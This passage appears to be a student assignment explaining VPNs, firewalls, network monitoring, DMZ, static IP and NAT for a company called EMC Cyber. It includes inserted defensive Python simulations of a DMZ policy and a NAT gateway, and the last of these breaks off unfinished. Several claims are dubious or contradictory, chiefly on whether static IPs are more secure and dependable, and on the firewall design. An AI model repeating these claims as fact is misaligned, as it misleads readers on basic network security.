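
The last packet shows the advantage listed above: the stateless filter lets it in because it has to keep high ports open for replies, while the stateful firewall drops it because no inside host opened that session.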

Virtual Private Network (VPN)


What is a VPN?
Users can transmit and receive data over shared or public networks as if their computer
equipment were physically linked to the private network using a virtual private network
(VPN), which extends a private network across a public network. Increases in functionality,
security, and private network administration are all advantages of a VPN. It is frequently used
by distant employees and gives access to resources that are not available on the public
network. Although not a fundamental component of a VPN connection, encryption is
frequently used.

How does a VPN work?

A VPN conceals your IP address by routing your traffic through a specially
configured remote server operated by the VPN host. In other words, if you use a
VPN to browse the internet, the VPN server becomes the apparent source of your
data. As a result, neither your Internet Service Provider (ISP) nor other parties
can see the websites you visit or the data you send and receive online. A VPN acts
as a filter that turns all your data into "gibberish": even if someone were to
obtain it, it would be useless to them.

 Client-based VPN types
o A client-based VPN connects an individual user to a remote network. An
application is usually needed to establish the connection.
o The user typically launches the VPN client manually and logs in with a
username and password. The client then establishes an encrypted tunnel between
the user's computer and the remote network, through which the user accesses
that network.
o Examples: Cisco's AnyConnect, Pulse (formerly Juniper), and Palo Alto
Networks' GlobalProtect.
 Network-based VPN
o Network-based VPNs are used to securely link two networks together over an
untrusted network.

VPN types

 Site-to-site VPN
o A site-to-site VPN is essentially a private network designed to connect
separate private intranets and let users of these secure networks access each
other's resources.
o If your business has several sites, each with its own local area network (LAN)
connected to the wide area network (WAN), a site-to-site VPN may be helpful. It
is also useful if you want to share files between two different intranets
without expressly allowing users of one intranet to access the other.

 Client-to-Server VPN
o Using a VPN client can be pictured as connecting your home PC to the business
with an extension cord. Employees can use the secure connection to dial into the
corporate network from their home office and act as though they were physically
present in the office. A VPN client must first be installed and configured on
the PC.
o This means the user connects to the internet directly through his or her VPN
provider rather than through their own ISP, which effectively shortens the
tunnel portion of the VPN journey. The VPN can automatically encrypt the data
before it is made available to the user, instead of using it to cloak the
existing internet connection with encryption.
 SSL VPN
o A corporation's employees frequently do not all have access to company
laptops that they may use for remote work. Many businesses struggled with
the issue of not having enough equipment for their staff during the Corona
Crisis in Spring 2020. Use of a private device (PC, laptop, tablet, or mobile
phone) is frequently employed in these situations. In this situation, businesses
revert to an SSL-VPN solution, which is often installed using an appropriate
hardware box.
o An HTML-5-capable browser is often required to access the company's login
page. There are browsers that support HTML-5 for almost every operating
system. By using a username and password, access is controlled.

Advantages of VPN
 Hide your IP address
o Your IP address is changed with a VPN, which is one of its biggest benefits.
This number, which functions like a home address, is automatically allocated
to your network. Your IP address allows websites and governments to
determine where you are, therefore, you might be unable to access some
prohibited pages because of geographical limitations.
 Encrypt your data traffic
o Your data transmission is encrypted via a VPN. This stops hackers and other
nefarious individuals from gaining access to crucial information like your
account passwords and financial data. You'll also be safer when you connect at
your neighbourhood Starbucks.
o This is crucial since accessing public Wi-Fi without any safety precautions in
place has several hazards. We always advise utilising a VPN while using
public internet hotspots, whether you're a self-employed business owner or
just want to browse in public.
 Download files safely and anonymously
o Third parties won't be able to determine who you are or what you're doing
online since your IP address is concealed and your connection is encrypted.
The secure VPN connection prevents them from reading the content that is
being downloaded. This benefit is especially helpful for employees who
handle sensitive corporate information while working from home. Anonymity
and privacy are assured, or at the very least significantly enhanced.
 Improve online gaming with better access and security
o Your precise location is modified when you use a VPN since all of your
internet traffic is encrypted. Like how this might get you access to particular
websites; it will also enable you to access online games that may be blocked in
your place of residence. Another possibility is that the game you wish to play
was released later in your nation than it was elsewhere in the world. You won't
have to wait much longer if you use a VPN. Simply select a server in your
home country to get started. Another advantage is that you may re-join the
service by quickly changing your IP address if you're being unfairly kicked
off.
 Avoid blockers and filters
o Internet censorship is a serious issue in some parts of the world, and one can
at least argue that users should have control over what they see. As a result,
more and more individuals are adopting VPNs, which can bypass web filters and
restricted websites, keeping the user in control of the situation.
 Improved security
o The main benefit of utilising a VPN is also the most obvious. Keep in mind that
the encrypted connection can be used remotely to protect things like our IP
address, company data, passwords, and statistics from hackers, major
technology groups, or anybody looking to take advantage of us.
o We can carry on working as usual: even the ISP (Internet Service Provider)
only receives encrypted information from the VPN server, so it cannot observe
what we are doing.

How do improper firewalls and VPNs affect EMC Cyber?

Figure 5 Firewall and VPN

EMC Cyber is a well-known supplier of cyber solutions in Sri Lanka. The company's
many clients, both in Sri Lanka and internationally, include some of the biggest
businesses in the world, serving a wide range of sectors.

The firm creates software for endpoint security, firewalls, anti-virus, and intrusion detection
and prevention. The responsibility for safeguarding business networks, clouds, online
applications, and emails falls to EMC Cyber. They also provide endpoint security, secure
unified access, and enhanced threat prevention.

Deploying VPN and firewall software is crucial only when EMC Cyber transacts with
international parties outside Sri Lanka. This is because, while networks are
being used to do business, the network system may be attacked by unauthorised
parties, and other private networks may be attacked as well.

When it is attacked by outside parties, particularly its rivals, they can learn
crucial information about EMC Cyber.

Installing strong firewalls is crucial for the firm to avoid the danger of
competitors learning about the EMC Cyber organisation. If the firewalls are poor,
we must be prepared for these threats.

The use of unsuitable VPNs is another issue that might occur while conducting
online transactions, since it can occasionally result in interruptions of web
traffic, poor concealment, and transactions involving smuggling websites, all of
which are problematic. Since inappropriate VPNs have the potential to harm EMC's
reputation, we must install the necessary VPNs. EMC Cyber is aware that these
problems result in a loss of data privacy, dependability, and more.

Network Monitoring System


What is Network Monitoring?

The process of continuously checking a computer network for issues like slow
traffic or component failure is known as network monitoring. Network monitoring
systems continuously scan the network in order to immediately alert network
managers to issues through text, email, or other applications like Slack. In
contrast to network security or intrusion detection systems, network monitoring
software focuses on internal network problems such as overloaded routers, downed
servers, or network connection difficulties that may affect other devices.

Network monitoring systems can also start a failover to remove problematic circuits or
devices from service until the problem can be fixed. A proactive network monitoring system
should be able to spot abnormalities that, if left unchecked, might cause an outage and stop
operations before they start.

Maintaining network integrity requires constant monitoring. The best network
monitoring tools offer a dashboard or visualisation that shows the status of the
monitored network components at a glance, highlighting any abnormal parameters
that need further investigation, or components like switches, routers, firewalls,
servers, software services, applications, or URLs that may be the cause of network
disturbances. For maximum effectiveness, a network monitoring system should
include high-availability components so that a hardware or software failure of the
systems running the network management tool can be automatically remediated by
failing over to another network monitoring installation.

Benefits of Implementing a Network Management System to EMC Cyber
 Preventing Downtime
o Downtime is costly and kills productivity. According to a recent poll, 40% of
business organisations indicated downtime would cost them between $1
million and $5 million per hour.
o EMC Cyber may prevent unplanned outages by monitoring. The identification
of warning indications that might point to a device failure or network issue is a
crucial component of network monitoring systems. This aids in problem
detection and helps EMC avoid downtime.
o In addition to preventing downtime, performance monitoring gives IT teams
the ability to improve performance for more productive operations.
 Maintaining Compliance
o The right network monitoring technologies must be in place for organisations
that must maintain regulatory compliance. In addition to any existing external
security measures, network monitoring is required for compliance with PCI
DSS, HIPAA, FISMA, SOX, and other regulations.
 Network Visibility
o The network of EMC must be completely under the control of EMC Cyber.
That covers all of the equipment connected to the EMC Cyber network as well
as all network traffic. It's the finest approach to monitor the health of the EMC
Cyber network and spot performance delays.
o It might be difficult to simply keep track of everything on the EMC Cyber
network. In conjunction with EMC Cyber network monitoring, automated
network mapping technologies may give a comprehensive overview of even
the most intricate ecosystems.
 Finding and Fixing Problems Quickly
o Network monitoring aids EMC in more immediately isolating issues as they
arise. Network maps may assist EMC in swiftly identifying the cause of any
issue, whether it be a traffic variation, a configuration error, or something
more significant. The monitoring solution from EMC includes network
automation technologies that may automatically resolve a number of issues.

o EMC's IT staff may concentrate on other problems by reducing Mean Time to
Repair (MTTR), which lessens the effects of downtime or subpar network
performance.
 Uncovering Security Threats
o The main purpose of network monitoring is to keep an eye on performance,
but it may also be used to find security issues inside the EMC Cyber system.
EMC may be able to identify even small risks before they become major ones
by continually scanning for strange or suspicious behaviour. Malware and
viruses, for instance, might not be immediately apparent, but EMC network
monitoring tools can identify anomalous activities, such as questionable usage
of network resources.
o Additionally, EMC will be able to proactively identify security risks like
DDoS assaults or illegal downloads.
 Deploying New Technologies
o When it comes to implementing new technologies, network monitoring is
equally crucial. It can assist in figuring out whether the network can manage
more resources and help proactively identify future performance problems.
EMC will be able to monitor the network after deployment to make sure
performance is not affected.
 Freeing Up IT Teams
o A further underappreciated advantage of network monitoring tools exists.
These days, IT staff have a lot on their plates. The complexity and
development of networks have put a heavy load on teams, who are frequently
understaffed but expected to deliver flawless performance. With the correct
network monitoring tools, like “Whatsup Gold”, the workload may be greatly
decreased.
o By receiving proactive notifications when anything needs repair and regaining
control of their network without having to manually examine performance, IT
professionals can cut down on downtime. Network monitoring tools make it
simpler to locate, isolate, and fix issues when they are discovered.

2.2 Explain how the following technologies would benefit EMC Cyber and its Clients by
facilitating a ‘trusted network’. (Support your answer with suitable examples).

i) DMZ

ii) Static IP

iii) NAT

Demilitarized Zone (DMZ)


What is DMZ?

A demilitarised zone (DMZ) is a physical or logical subnet in computer networks that isolates
a local area network (LAN) from other untrusted networks, often the public internet.
Perimeter networks and screened subnetworks are other names for DMZs.

Any service offered to internet users should be situated in the DMZ network. There are often
servers, resources, and services that are accessible from the outside. Web, email, domain
names, File Transfer Protocol, and proxy servers are some of the most popular of these
services.

The remainder of the internal LAN cannot be reached, but servers and resources in the DMZ
are reachable from the internet. This method adds an extra degree of protection to the LAN
by preventing internet-based direct access by hackers to internal systems and data.

How does a DMZ work?

DMZs serve as a buffer zone between the private network and the public internet. Between
two firewalls is where the DMZ subnet is installed. Before reaching the servers housed in the
DMZ, all incoming network packets are then checked using a firewall or another security
appliance.

Threat actors that are more prepared must first get past the first firewall in order to access the
DMZ services without authorization. These systems are probably fortified against such
assaults.

Finally, even if well-funded threat actors manage to gain control of a machine
located in the DMZ, they still need to get past the internal firewall in order to
access key company resources. Even the most secure DMZ design may be breached by
determined attackers, but when a DMZ is attacked, alarms go off, giving security
staff enough time to stop a full intrusion into their firm.

Architecture and design of DMZ networks

A DMZ can be included into a network in a variety of ways. Although most contemporary
DMZs are built with two firewalls, there are two main approaches: using one or two
firewalls. Expanding on this strategy will result in increasingly intricate designs.

A network architecture with a DMZ may be built using a single firewall with at
least three network interfaces. The firewall's first network interface is
connected to the public internet through an internet service provider, forming
the external network. The second network interface forms the internal network,
and the third network interface connects to the DMZ network.

Different sets of firewall rules for DMZ monitoring, LAN monitoring, and internet
monitoring tightly control which ports and types of traffic are allowed into the DMZ from the
internet, limit connectivity to hosts in the internal network, and prevent unauthorised
connections to either the internet or the internal LAN from the DMZ.

A dual-firewall setup, in which the DMZ network is installed between two firewalls, is the
safer method of establishing a DMZ network. The first firewall, often known as the perimeter
firewall, is set up to only allow outbound traffic going to the DMZ. Only traffic from the
DMZ to the internal network is allowed through the second firewall, which is internal.
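The single-firewall, three-interface design described above can be written as a zone-pair policy: traffic is classified by the zone it comes from and the zone it goes to, and only listed pairs and ports pass. The Python below is an added example, not part of the original assignment; the address ranges, allowed ports and sample flows are constructed assumptions.

```python
import ipaddress

# Constructed address plan for a single firewall with three interfaces.
ZONES = {
    "internal": ipaddress.ip_network("10.0.0.0/8"),
    "dmz": ipaddress.ip_network("192.0.2.0/24"),
}

# Rule sets per zone pair: which destination ports may cross. A pair that is
# missing here (notably dmz -> internal and internet -> internal) is denied.
POLICY = {
    ("internet", "dmz"): {25, 80, 443},       # published mail and web services
    ("internal", "dmz"): {22, 25, 80, 443},   # staff and admins reach DMZ hosts
    ("internal", "internet"): "any",          # ordinary outbound access
    ("dmz", "internet"): {53},                # DMZ hosts may only resolve names
}


def zone_of(addr: str) -> str:
    """Classify an address by the interface (zone) it lives behind; anything
    outside the two private ranges is treated as the internet."""
    ip = ipaddress.ip_address(addr)
    for name, net in ZONES.items():
        if ip in net:
            return name
    return "internet"


def allowed(src: str, dst: str, dport: int) -> bool:
    """Apply the zone-pair policy; anything not explicitly permitted is denied."""
    ports = POLICY.get((zone_of(src), zone_of(dst)))
    if ports is None:
        return False
    return ports == "any" or dport in ports


def audit(flows: list[tuple[str, str, int]]) -> list[tuple[str, str, int, bool]]:
    """Evaluate a batch of (src, dst, dport) flows, e.g. taken from a log."""
    return [(s, d, p, allowed(s, d, p)) for s, d, p in flows]


# Constructed flows, including what a compromised DMZ host might attempt.
SAMPLE_FLOWS = [
    ("198.51.100.9", "192.0.2.10", 443),   # internet -> DMZ web server
    ("198.51.100.9", "10.0.0.5", 445),     # internet -> internal file share
    ("192.0.2.10", "10.0.0.5", 3306),      # DMZ -> internal database
    ("192.0.2.10", "203.0.113.53", 53),    # DMZ -> internet DNS
    ("192.0.2.10", "203.0.113.77", 443),   # DMZ -> arbitrary internet host
    ("10.0.0.5", "192.0.2.10", 22),        # internal admin -> DMZ host
]

if __name__ == "__main__":
    for s, d, p, ok in audit(SAMPLE_FLOWS):
        print(f"{zone_of(s):8} -> {zone_of(d):8} port {p:<5} "
              f"{'ALLOW' if ok else 'DENY'}")
```

The third and fifth flows are the ones the text cares about: a DMZ host that has been taken over still cannot reach the internal database or open arbitrary outbound connections.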

What are the Advantages of using a DMZ?


Access control:

 A DMZ network offers access control to services accessed over the internet but
located outside of a company's network boundaries. At the same time, it adds a layer
of network segmentation that raises the bar for users to clear to access a company's
private network. Some DMZs come with a proxy server, which centralises the flow of
internal internet traffic, often that of employees, and makes recording and monitoring
that traffic easier.

Network reconnaissance prevention:

 A DMZ also prevents an attacker from scanning the network for possible targets. The
internal firewall keeps the private network secure and separate from the DMZ even if
a system there is hacked. Active external reconnaissance is more challenging under
this scenario. Despite being exposed to the public, the servers in the DMZ are
supported by an additional level of security. Attackers are prevented from viewing the
data on the internal private network by the DMZ's public face. Even if attackers are
successful in taking control of DMZ servers, they are still cut off from the private
network by the DMZ's internal firewall.

Protection against Internet Protocol (IP) spoofing:

 Attackers occasionally try to get around access control limitations by faking an
allowed IP address to pass as another network device. While another service on the
network confirms the authenticity of the IP address by determining whether it is
reachable, a DMZ can stop possible IP spoofers.

Examples for DMZ

1. Cloud services: Some cloud services, like Microsoft Azure, employ a hybrid approach
to security where a DMZ is set up between an organization's physical network and the
virtual network.
2. Home networks: In a home network that is set up as a LAN and has PCs and other
devices linked to the internet through a broadband router, a DMZ can also be helpful.
3. Industrial control systems (ICS): DMZs offer a viable remedy for the security
problems associated with ICSs, as information technology (IT) converges with
industrial equipment such as turbine engines and ICSs.

Static IP
What is Static IP?

A computer's static IP address is a 32-bit value that serves as its internet address. Usually, an
internet service provider (ISP) will supply this number, which looks like a dotted quad.

An internet-connected device's IP address, or "internet protocol address," serves as a special
identification number. Like how individuals use phone numbers to locate and communicate
with one another on the phone, computers use IP addresses to locate and communicate with
one another online. An IP address might reveal details about the hosting company and
geographical information.

How static IP addresses work?

If a person or organisation wants a static IP address, they must first contact
their ISP and ask it to assign a static IP address to their device, such as a
router. Most ISPs do not offer static IP addresses by default. Once the device is
configured with its new, permanent IP address, it will need to be restarted. The
computers and other hardware behind the router will share that IP address. Once
set up, the IP address doesn't need to be managed, because it stays the same.

However, because there is a cap on the number of static IP addresses that may be requested,
paying for a static IP address is frequently necessary. A solution to this problem is IPv6.
Static IP addresses are now much simpler and less expensive to acquire and maintain thanks
to IPv6, which lengthens IP addresses from 32 bits to 128 bits (16 bytes) and greatly
increases the number of accessible IP addresses. Today, a sizable amount of internet traffic
still utilises IPv4, but more and more of it is switching to IPv6, so both are in use.

Up to 340 undecillion different IP addresses can be used using IPv6. To put it into
perspective, there are currently 340 trillion, trillion, trillion distinct IP addresses that may be
allocated, which is 340 followed by a total of 36 zeros. This increase in the total number of IP
addresses enables significant future expansion of the internet and alleviates what was
anticipated to be a future scarcity of network addresses.

Advantages of Static IP addresses


 Speed
o Devices allocated a static IP address often operate more quickly because static
IP addresses have fewer inconsistencies. The speed difference is only noticeable
if you use broadband; with DSL connections it is not. If you often upload and
download files, this is extremely helpful.
 Security
o A Static IP address will always provide a higher level of protection. An
additional degree of security built into static IP addresses ensures that most
security issues are avoided.
 Accessibility
o Static IP addresses enable remote access using software such as Virtual
Private Network (VPN). Devices may therefore be accessed from anywhere in
the world. All of the facts are made available as long as the gadget is online.
 Hosting
o Static IP addresses now allow all hosting kinds from web servers to email
servers and other sorts of servers. All your customers and clients may
therefore readily visit your website if you have a static IP address.
Additionally, the devices can quickly identify and find all servers globally
when utilising a static IP address.
 Stability
o Since modifications are prohibited, all static IP addresses are known to remain
stable. It doesn't experience frequent gaps as a dynamic IP address does. The
machines will be able to instantly re-connect to the internet whenever there is
a reboot using the same IP address.
 Accuracy
o When it comes to geolocation information, a static IP address is quite accurate.
The precise business location will be found by all geolocational services. With
this precise information, it is possible to be sure that the companies are
constantly on the front lines. This has several advantages for enterprises.

Network address translation (NAT)


What is NAT?
Network address translation (NAT) modifies the network address information in packets' IP
headers as they pass through a traffic routing device to translate one IP address space into
another. [1] When a network was moved or when the upstream Internet service provider was
changed but was unable to route the network's address space, the approach was first
employed to avoid the requirement to give new addresses to every site. In light of the IPv4
address exhaustion, it has grown to be a widely used and crucial technique for global address
space preservation. A NAT gateway's single Internet-routable IP address can be utilised for
the whole private network.

NAT solutions may differ in their specific behaviour in different addressing scenarios and
their impact on network traffic because NAT alters the IP address information in packets.
Vendors of equipment with NAT implementations do not frequently describe the nuances of
NAT behaviour.

How does NAT work?

A NAT device acts as the gateway between two networks: the internal network and
the external network. Typically, systems on the internal network are allocated IP
addresses that cannot be routed to outside networks (such as those in the
10.0.0.0/8 block).

The gateway has a few externally valid IP addresses assigned to it. It makes
outbound traffic from an inside system appear to originate from one of the valid
external addresses, and it redirects incoming traffic intended for a valid
external address to the appropriate internal system.

44 | P a g e
This promotes security. Due to the requirement that every incoming and outgoing request
undergo a translation process, there is the potential, for instance, to qualify or verify
incoming streams and match them to outgoing requests.
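How the translation table lets the gateway match incoming streams to outgoing requests and drop everything else, as an added example that is not part of the original assignment: a small NAT overload (port address translation) gateway written in Python. The public address 203.0.113.5, the inside host 10.0.0.7 and the remote peers are constructed documentation-range addresses, and the port allocation scheme (sequential from 40000) is an assumption of this example, not the behaviour of any particular NAT product.

```python
"""Added example, not from the assignment: a minimal NAT overload (PAT) gateway
simulated in pure Python. Inside hosts use 10.0.0.0/8 addresses; the gateway owns
one public address. Outbound packets are rewritten to (public address, allocated
port) and a translation entry is recorded; inbound packets are forwarded only when
they match an entry, both on port and on the remote peer, so unsolicited traffic is
dropped. All addresses and ports are constructed sample values."""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Dict, Optional, Tuple

INTERNAL = ip_network("10.0.0.0/8")  # private internal address block


@dataclass(frozen=True)
class Packet:
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int


class NatGateway:
    def __init__(self, public_ip: str, first_port: int = 40000) -> None:
        self.public_ip = public_ip
        self.next_port = first_port  # assumption: sequential public port allocation
        # Flow key (inside ip, inside port, remote ip, remote port) -> public port
        self.flows: Dict[Tuple[str, int, str, int], int] = {}
        # Public port -> flow key, used to reverse the translation on replies
        self.by_port: Dict[int, Tuple[str, int, str, int]] = {}

    def translate_outbound(self, pkt: Packet) -> Optional[Packet]:
        """Rewrite an inside -> outside packet; None means the packet is dropped."""
        if ip_address(pkt.src_ip) not in INTERNAL:
            return None  # only inside hosts may use the gateway
        key = (pkt.src_ip, pkt.src_port, pkt.dst_ip, pkt.dst_port)
        port = self.flows.get(key)
        if port is None:  # first packet of a new flow: allocate a public port
            port = self.next_port
            self.next_port += 1
            self.flows[key] = port
            self.by_port[port] = key
        return Packet(self.public_ip, port, pkt.dst_ip, pkt.dst_port)

    def translate_inbound(self, pkt: Packet) -> Optional[Packet]:
        """Rewrite an outside -> inside packet; None means no matching flow, drop."""
        if pkt.dst_ip != self.public_ip:
            return None
        key = self.by_port.get(pkt.dst_port)
        if key is None:
            return None  # nobody inside asked for this: unsolicited, drop
        inside_ip, inside_port, remote_ip, remote_port = key
        if (pkt.src_ip, pkt.src_port) != (remote_ip, remote_port):
            return None  # right port, wrong peer: does not match the outgoing request
        return Packet(pkt.src_ip, pkt.src_port, inside_ip, inside_port)


def demo() -> Dict[str, Optional[Packet]]:
    """Constructed traffic: one legitimate web flow and two unsolicited probes."""
    gw = NatGateway("203.0.113.5")
    request = Packet("10.0.0.7", 51000, "198.51.100.20", 443)
    out = gw.translate_outbound(request)
    reply = gw.translate_inbound(Packet("198.51.100.20", 443, "203.0.113.5", out.src_port))
    probe_unused_port = gw.translate_inbound(Packet("192.0.2.99", 8080, "203.0.113.5", 40001))
    probe_wrong_peer = gw.translate_inbound(Packet("192.0.2.99", 8080, "203.0.113.5", 40000))
    return {
        "outbound": out,
        "reply": reply,
        "probe_unused_port": probe_unused_port,
        "probe_wrong_peer": probe_wrong_peer,
    }


if __name__ == "__main__":
    for name, pkt in demo().items():
        print(f"{name:18} -> {pkt if pkt else 'dropped'}")
```

The two probes show the security property the text describes: a packet to a public port that no inside host has opened, or one arriving from a peer other than the one the inside host contacted, has no matching outgoing request and is dropped before it ever reaches the private network.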

Advantages of NAT
• Lowers the cost
  o Any business that uses NAT with private IP addresses saves money by not
    having to buy a public IP address for each of its machines: many machines
    can share the same public address. This helps lower organisation costs.
• Conserving addresses
  o NAT overload conserves the IPv4 address space while still giving every host
    on a privatised intranet access to the internet. In this mode the addresses
    are shared at the port level across many programmes and hosts.
• Connection flexibility
  o NAT includes a variety of features, including backup and load-balancing
    solutions, which improve the network's overall flexibility and
    dependability. These apply whenever a link is built, whether to the public
    internet or to one of the organisation's own connections.
• Network security
  o NAT completely conceals the original source and destination addresses of the
    internal network. Hosts outside the network cannot reach hosts inside it
    unless the user permits it, which gives the network extra security.
• Private addressing
  o The organisation owns its private IPv4 addressing scheme and keeps it even if
    it switches to a different internet service provider: changing providers
    does not require changing the internal addresses.

How does DMZ, Static IP, NAT help EMC cyber?


DMZ

A DMZ refers to a host or network segment that sits on the path between the internal
network and the external network; it is a secure, intermediary network. When EMC Cyber
interacts with its clients, certain external systems may attempt to attack its network
systems.

To stop these kinds of assaults, EMC Cyber could deploy DMZ network technologies.

Static IP

A static IP address is the fixed number that the internet service provider gives a
machine. Static IPs are helpful for internet hosting or Voice over Internet Protocol
(VoIP). Dynamic IP addresses, by comparison, are more dependable than static IP
addresses since they do not require the time-consuming manual configuration process,
and a dynamic IP is less susceptible to assaults than a static one since it changes
over time.

The main benefits of using static IPs are speed, dependability, and security. Since
EMC Cyber's transactions with foreign nations demand a fast internet connection,
static IPs may be extremely useful to EMC Cyber.

NAT

With network address translation, EMC Cyber decides how many public IP addresses to
use, for both practical and security reasons. With a public IP address in place, the
EMC Cyber network has to respond to queries from unknown IP addresses; NAT helps EMC
Cyber stop such unwanted traffic.

2.3 Identify and evaluate the tools that can be utilized by EMC cyber to improve the
network and security performance without compromising each other. Evaluate at least
three virtual and physical security measures that can be implemented by EMC to
uphold the integrity of organization’s IT policy.

Tools to improve the Network of EMC cyber


SolarWinds Network Performance Monitor

A thorough network performance monitoring tool that can track device status via SNMP is
SolarWinds Network Performance Monitor. It can automatically find network devices linked
to your network. Utilize the dashboard to keep a close eye on the performance and
availability of all connected network devices.

Key features:

• SNMP monitoring
• Automatically discovers connected network devices
• Network packet analysis
• Intelligent network maps with NetPath
• Create Wi-Fi heat maps
• Alerts system
• Reports system

Figure 6 SolarWinds Network Performance Monitor

AUVIK

AUVIK is a cloud-based network monitoring solution that includes a variety of system
management tools. Once you open an account and access the package through a web
browser, the installation procedure sets up collectors on your computer. The Auvik
programme can oversee and centralise the monitoring of several locations, so the suite
is well suited to WAN monitoring.

A network discovery procedure is the first step in the service offered by Auvik. This
automatically fills in all the fundamental data required for the monitor to function. The
ongoing discovery service will detect when new devices are connected to the network.

Key features:

• Automated setup
• Network mapping
• Resource utilization alerts
• Configuration management

Figure 7 AUVIK

Datadog Network Performance Monitoring

Datadog Network Performance Monitoring is a cloud-based SaaS infrastructure monitoring
solution that looks at network traffic flows. It is linked with a network device
monitoring service, which focuses on the status of each network device, including
switches, routers, and appliances.

Key features:

• Live network mapping and protocol analysis
• Alerts on performance thresholds that are adjusted through machine learning
• Correlation with data from SNMP and other sources

The network monitoring efforts for several sites and cloud services may be combined using
the Network Performance Monitor. The monitoring software's CPU and storage space are
both included in the service as a SaaS package. This network monitoring service provides
packet capture and analysis tools in addition to live status updates.

Figure 8 Datadog Network Performance Monitoring

PRTG Network Monitor

PRTG Network Monitor is a free network monitoring package that keeps an eye on your
network using SNMP, packet sniffing, and WMI. Search for and add devices to monitor by
scanning network segments. To keep an eye on different parts of your network, you may pick
from a variety of sensors. Each sensor tracks a different value within your network; for
example, there are sensors for bandwidth monitoring, hardware parameters, network data
utilisation, SNMP, VOIP, QoS, and more.

Key features:

• SNMP monitoring
• Bandwidth monitoring
• Scan for network devices by IP segment
• Custom dashboards
• Threshold-based alerts system
• Reports system
• Customizable network maps

Figure 9 PRTG Network Monitor

Tools to improve the Security of EMC cyber


ENDPOINT PROTECTION

• Endpoint protection involves safeguarding data as it enters the system and
  monitoring each system operation and file on an organisation's endpoints. VPNs
  may also be used to secure the communication paths connecting various network
  resources.
• VPN technologies aid in the proactive identification of possible risks such as
  malware and ransomware. Administrators can approve the desktop computers,
  laptops, and mobile devices that have access to the company's network.
  Employees using endpoint protection on their systems can rely on public Wi-Fi
  without increasing their risk exposure, because VPNs encrypt the data streams.
• The endpoint should be secured since attacks against VPNs are more likely. It
  may be challenging to determine whether data is under assault, since it can be
  coming from a trustworthy system or source.
• Data is a significant asset in any firm, and its loss might raise the
  likelihood of that organisation going bankrupt. For this reason, endpoint
  protection is crucial. The growing number of endpoints can make data security
  processes more difficult.

CLOUD-ENABLED SECURITY

• Cloud-enabled security is one of the best data security technologies for
  protecting data. Organisations can get the best data security solutions without
  the need for extra infrastructure or internal personnel by moving data to the
  cloud.
• Although cloud-based systems are affordable, effective, and accessible, they
  differ in how they are built and are not impervious to intrusion. Finding cloud
  platforms and apps that provide the highest level of data protection is crucial.
• Because no software or hardware is needed with cloud solutions, data protection
  costs are kept to a minimum. When implementing cloud data storage, rules such as
  HIPAA and PCI may present some difficulties; before deploying a cloud solution,
  businesses should do their research and make sure the storage is compliant.
  Good cloud security solutions support enterprise assets regularly and
  consistently, including through live monitoring.

FIREWALLS

• The goal of firewalls is to track both incoming and outgoing network traffic.
  They can use deep packet inspection (DPI) or other sophisticated analyses to
  restrict or permit specific network operations.
• Because they are simple to set up and have little effect on daily operations,
  firewalls are often the first line of protection for many enterprises. Like
  many other security technologies, however, firewalls are not perfect.
• They are widespread, and even the most sophisticated firewalls may fail to
  detect some attacks. Therefore, it is crucial to consider additional data
  security measures. Regular assessments, user access protection, data backups,
  and other elements should be part of a layered security approach.
• Firewalls help prevent data hacking. Hacking dangers are increasing as more
  corporate settings adopt digital strategies. A firewall protects an
  organisation from illegal connections and potential hackers, and by enhancing
  network security it builds customer trust and improves brand reputation.

PASSWORDS

• Passwords are a cheap and effective way to safeguard data against unwanted
  access. Making passwords strong and changing them frequently increases their
  efficacy by making it difficult for attackers to guess them and gain access to
  the system.
• Users should be advised to choose complex passwords that are difficult to guess
  and not to share them. The passwords should, however, be easy to remember so
  that users won't need to write them down.

Virtual Security Measures implemented by EMC Cyber

• Connection policies and address validation
  o Virtual networks ride on top of real networks, typically IP networks such as
    IP VPNs or the internet. Every virtual endpoint is also a real network
    endpoint, and from the real network or endpoint below it is possible to
    attack or leap onto the virtual network. It is erroneous to believe that
    virtual network overlays will address security issues; the real network must
    still be protected.
  o Generally, setting forwarding policies between subnetworks is necessary to
    increase virtual network security. In IP networks, each subnet has a fixed
    address range that connects all its users and resources. If a subnet should
    only accept connections from specific other subnets, use filtering policies
    at the subnet border to enforce that restriction.
  o Source address validation on packets is a crucial component of virtual
    network security, because it prevents spoofing. Every packet in an IP network
    comes from a subnetwork, and each member of that subnetwork is given an
    address from its pool. If the gateway device for the subnet checks that the
    source address of each packet lies within the subnet's range, the danger of
    intrusion through spoofing is significantly reduced.
• Secure gateway access between networks
  o A related issue is on-ramp security for virtual networks, which secures the
    points of entry between networks and subnets.
  o A virtual network often has several locations where its users may access
    external resources such as the internet, and where external users can use
    the resources of the virtual network. To prevent illegal connections from
    being established at those points, this connectivity must be expressly
    provided through one or more virtual network gateways, which must enforce
    access controls. An open link between a company's virtual network and the
    internet could give attackers access to the larger corporate network.
  o A virtual network should only allow communication through specified access
    points. Any attempt to establish a direct link with the outside world at a
    different node within the virtual network should be treated as a security
    breach and potentially as a hack, malware attack, or denial-of-service
    attack.
• Connection access control
  o Because on-ramp connection rules are intended to keep intruders out rather
    than to keep users in line, it is vital to recognise that restricting
    communications to the outside will not eliminate the need for virtual
    network access security. To prevent network users from unintentionally or
    deliberately leaking data, more precise connection policy rules are
    essential. The options available for connection security in virtual network
    systems differ greatly. This is especially true of SD-WANs, which may
    supplement MPLS VPNs by adding new locations where MPLS is unavailable or too
    expensive to install. A proper SD-WAN deployment may significantly enhance
    connection policy controls, which enhances network security as a whole.
  o However, as most SD-WAN implementations do not include incremental
    connection security capabilities, users will need to set connection and
    access control rules for network traffic on the IP network that lies beneath
    the SD-WAN. Only a few SD-WANs give explicit session and connection
    restrictions for all traffic, and only 15% of SD-WANs offer connection
    policy control.
  o The most important development in IT and network security is explicit
    connection management at the virtual network level. Most network security
    tools today concentrate on preventing intrusions, which is useless against
    insider threats, that is, persons who are legally allowed to access the
    network but choose to abuse it. With explicit connection control,
    enterprises specify which users and resource sessions they consider valid,
    and all other connections are denied. Explicit connection management
    replaces permissive connectivity, the current IP network assumption.
    Although working out the range of acceptable connections in advance may be
    burdensome to some users, security management always requires something
    similar. The number of rules that need to be defined may often be reduced by
    categorising people and resources by role or subnet.
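The subnet-border controls described under "Connection policies and address validation" (source address validation and filtering policies between subnets) together with the default-deny explicit connection control described under "Connection access control", as an added Python example that is not part of the original assignment. The subnet 10.1.0.0/24, its allow-list, the RFC 1918 address plan used to define "inside the virtual network", and the sample packets are all constructed for illustration.

```python
"""Added example, not from the assignment: a subnet-border filter that applies
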